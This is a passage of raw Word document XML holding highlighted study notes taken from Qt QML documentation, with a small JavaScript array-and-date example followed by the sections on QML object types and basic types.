        <w:t>Item</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D815C8" w:rsidRPr="00906D8E" w:rsidRDefault="00D815C8" w:rsidP="00D815C8">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906D8E">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00906D8E">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r w:rsidRPr="00906D8E">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> theArray</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>new</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Array</w:t>
      </w:r>
      <w:r w:rsidRPr="00906D8E">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D815C8" w:rsidRPr="00906D8E" w:rsidRDefault="00D815C8" w:rsidP="00D815C8">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r w:rsidRPr="00906D8E">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> theDate</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>new</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Date</w:t>
      </w:r>
      <w:r w:rsidRPr="00906D8E">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>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Component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onCompleted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for</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> i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i </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;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10</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i</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theArray</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push</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"Item "</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i</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console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log</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"There are"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theArray</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length</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"items in the array"</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console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log</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"The time is"</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theDate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toUTCString</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Fonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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See</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId110" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>JavaScript Expressions in QML Documents</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for more details.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D815C8" w:rsidRPr="00D815C8" w:rsidRDefault="00D815C8" w:rsidP="00FD0330">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="176" w:name="qml-object-types"/>
      <w:bookmarkStart w:id="177" w:name="_Toc483000570"/>
      <w:bookmarkStart w:id="178" w:name="_Toc483003591"/>
      <w:bookmarkStart w:id="179" w:name="_Toc483603922"/>
      <w:bookmarkStart w:id="180" w:name="_Toc483605142"/>
      <w:bookmarkEnd w:id="176"/>
      <w:r w:rsidRPr="00FD0330">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML Object Types</w:t>
      </w:r>
      <w:bookmarkEnd w:id="177"/>
      <w:bookmarkEnd w:id="178"/>
      <w:bookmarkEnd w:id="179"/>
      <w:bookmarkEnd w:id="180"/>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highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>A QML object type is a type from which a QML object can be instantiated</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. QML object types </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">are derived </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD0330">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD0330">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId111" w:history="1">
        <w:r w:rsidRPr="00FD0330">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QtObject</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>are provided by</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> QML modules. Applications can import these modules to use the object types they provide. The</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highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QtQuick</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>module provides</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the most common object types needed to create user interfaces in QML.</w:t>
      </w:r>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Finally, </w:t>
      </w:r>
      <w:r w:rsidRPr="00906D8E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="262626"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>every QML document implicitly defines a QML object type</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, which can be re-used in other QML documents. See the documentation about</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId112" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>object types in the QML type system</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for in-depth information about object types.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D815C8" w:rsidRDefault="00D815C8" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005A6BBD" w:rsidRPr="00D815C8" w:rsidRDefault="00490E7E" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId113" w:history="1">
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://qt-project.org/doc/qt-5.1/qtqml/qtqml-typesystem-basictypes.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00D815C8" w:rsidRPr="00D815C8" w:rsidRDefault="00D815C8" w:rsidP="00FD0330">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="181" w:name="_Toc483000571"/>
      <w:bookmarkStart w:id="182" w:name="_Toc483003592"/>
      <w:bookmarkStart w:id="183" w:name="_Toc382058575"/>
      <w:bookmarkStart w:id="184" w:name="_Toc483603923"/>
      <w:bookmarkStart w:id="185" w:name="_Toc483605143"/>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML Basic Types</w:t>
      </w:r>
      <w:bookmarkEnd w:id="181"/>
      <w:bookmarkEnd w:id="182"/>
      <w:bookmarkEnd w:id="184"/>
      <w:bookmarkEnd w:id="185"/>
    </w:p>
    <w:p w:rsidR="00D815C8" w:rsidRPr="00D815C8" w:rsidRDefault="00D815C8" w:rsidP="00D815C8">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML supports a number of basic types.</w:t>
      </w:r>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lastRenderedPageBreak/>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00186E45">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">basic </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD0330">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD0330">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD0330">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is one that refers to a simple value</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, such as an</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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>or a</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string</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. This contrasts with a</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId114" w:anchor="qml-object-types" w:history="1">
        <w:r w:rsidRPr="00186E45">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QML Object Types</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00186E45">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, which refers to an object</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> with properties, signals, methods and so on. Unlike an object type, a basic type </w:t>
      </w:r>
      <w:r w:rsidRPr="00186E45">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cannot be used to declare QML objects</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: it is not possible, for example, to declare an</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int{}</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object or a</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size{}</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D815C8" w:rsidRPr="00D815C8" w:rsidRDefault="00D815C8" w:rsidP="00D815C8">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="24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Basic types can be used </w:t>
      </w:r>
      <w:r w:rsidRPr="00186E45">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to refer to</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D815C8" w:rsidRPr="00D815C8" w:rsidRDefault="00D815C8" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00186E45">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>A single value</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId115" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
